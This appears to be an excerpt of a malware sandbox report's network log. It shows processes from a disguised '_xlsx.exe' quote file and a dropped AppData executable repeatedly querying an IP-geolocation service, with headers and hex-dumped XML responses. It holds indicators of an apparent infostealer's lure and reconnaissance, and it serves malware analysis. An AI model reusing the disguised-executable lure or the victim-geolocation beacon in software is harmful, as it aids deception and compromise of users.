                                                                      0192.168.2.749729188.114.96.34437944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:22 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2024-10-07 12:52:22 UTC674INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:22 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61877
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Tpv9eO92bzfrTNRAWncnNCsI0fAB7TKEZibKmjcOQ1hRnAx6vrI7a3T49Ka1QVR6wKzno7tZgktHhcdYDtMdJaCJboPCLDl4xfWLbZfySzBkWUFVd7dxMR1hXyw%2BJ7OEl5lBm4%2B"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee072afa5043bd-EWR
                                                                      2024-10-07 12:52:22 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.749740188.114.96.34437944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:23 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      2024-10-07 12:52:23 UTC676INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:23 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61878
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j8Hfar9CGOv3gvJgN37k%2FErynThBd8ee87rSvvsfc4IrLTFaaMFMe7JKe4mIHwsCmzmRV%2FD9Q5Wj3vgkzEcKvQWiRr%2BUX4eSHZEfKTM10oLvHfelHDQQ1yRTkcbAN3z30OSYgX9D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee07304bda432c-EWR
                                                                      2024-10-07 12:52:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.749748188.114.96.34437944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:24 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2024-10-07 12:52:25 UTC672INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:24 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61879
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kiynl8RDzEyjTUVnqY6zUqhmNocs2nnGnPfNsm3V8674jujaKTBxFSqxs6KKbsQ%2FpFRIVjKEgyUSIXTDxxZPJ0U33qRsyWs5YRxFFioEqkC5kS2rQ59Q8XdHyC8m8AdjEoXGTrvw"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee07381846437e-EWR
                                                                      2024-10-07 12:52:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.749762188.114.96.34437944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2024-10-07 12:52:26 UTC680INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:26 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61881
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0d0o%2FsnXDWRyWlHZwVCuBImXMDFCPlsYDmpgdl%2F7YO2KaWywbH8ert%2FzmyPOwRWnqh%2B%2BtP4WQOH1W6V4NmKwayrLZdTQOkXIaEBv8F214HF5v1EW4434KLHaaaluB9aXSLddBFKW"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee0740281b1801-EWR
                                                                      2024-10-07 12:52:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.749768188.114.96.34436504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2024-10-07 12:52:26 UTC686INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:26 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61881
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bt%2BViTJ5v2lQItP7jfQDzJzTA%2FLtIwLP%2F%2FEqUkNcKsY48uDLhOd8o%2B9AEOc804CAFuxDHml2x4slj2yJDkl3o84GAtp%2F2pabVvAq%2BniCi9%2FgYeNxjbJoTSaElxENnWl2C96fv51T"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee07431a058cd4-EWR
                                                                      2024-10-07 12:52:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.749776188.114.96.34436504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:27 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      2024-10-07 12:52:27 UTC674INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:27 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61882
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BnP4KR7ih0CebEnWwF5k%2F1Dpn3ncwB1xsOg7OkTOvBENrKPkM63fRpxTrSUMbjsAnAIJzE7G1txjlIkTJzLiJWKrU9BqYMRryHhMgiW%2BaXAoSCzXXX7NAO8oQiBq9422aFEB4DP9"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee07485c038cb4-EWR
                                                                      2024-10-07 12:52:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.749775188.114.96.34437944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:27 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      2024-10-07 12:52:27 UTC676INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:27 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61882
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6%2B4diHPUcNWY5xMnOIWjk1MtCsaTha9GdnU5II%2BSUbazQrxWkZlUA5UaIIjGBJ2ezUzQmBD4dS9Fotohw%2FO6yl4Y3Oftin52puxR5K7vt4toyPtmxDTpG2KvLzDL9qtHA7cvpvhc"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee074858b69dff-EWR
                                                                      2024-10-07 12:52:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.749788188.114.96.34437944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:28 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2024-10-07 12:52:28 UTC674INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:28 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61883
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ta2h1NdB%2Fuz6UxgCyn0uX6ZT0IiSxClKG7RrNvxzrKLSplniq2Rvx3GRwGkLLJC%2BHw8xltSWslwDomSgZDivEsatF0A5huTStjYQ6MspLsYnd28hDmXkKjOuM2zz9IA1UGhit8bg"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee07505ddc0cc6-EWR
                                                                      2024-10-07 12:52:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.749790188.114.96.34436504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:28 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2024-10-07 12:52:29 UTC674INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:28 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61883
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HpvCbu4L%2BGtCjxock9dYSQ78mQnPkwTuX3TbTijDrffIsaG8xc0i1VU0HZ0ugHF9a7tT%2Bc6sQAgOPmM08dBM52XvtUiDQcMEODwibPfjzbxPLposZJaJGsBM0NXOER8w7b7zNaND"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee0750fb8a43f8-EWR
                                                                      2024-10-07 12:52:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.749798188.114.96.34437944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:30 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      2024-10-07 12:52:30 UTC682INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:30 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61885
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MF0iLkuqFpg1su8tcqBE49NmaaJFXhsV4QNZj3%2BuAPdXZBq4hvAHMjD%2FSQ0e1%2Fm70yJFXPtHKAnqdosCIjsb%2F%2FDGidKOu3jy7CijWXLuD8iuNgLDet0Skwsd9dmSMxfHQm3CH%2BlK"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee07589a6417f9-EWR
